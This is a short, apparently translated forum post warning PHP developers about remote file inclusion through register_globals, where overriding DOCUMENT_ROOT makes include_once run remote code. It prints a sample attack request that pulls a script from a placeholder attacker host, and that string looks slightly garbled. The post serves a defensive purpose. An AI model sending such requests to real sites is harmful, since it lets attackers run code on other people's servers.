Recently I got acquainted with a relatively new hack idea for the included register_globals: if the code has include_once($_SERVER['DOCUMENT_ROOT']."file.php") then It is enough for us to pass a line like: "/?_SERVER[DOCUMENT_ROOT_UR==http://hacksite/hackcode.txt?" That there was a substitution and performance of our script on a consumer site.
The moral of this fable is old: be careful and do not allow to form any request through the transmitted parameters. UPD: I’ll clarify that there is already a bot to scan for a similar vulnerability, and this log is real, only the site from which this log is taken is changed, so this is not just a theoretical vulnerability.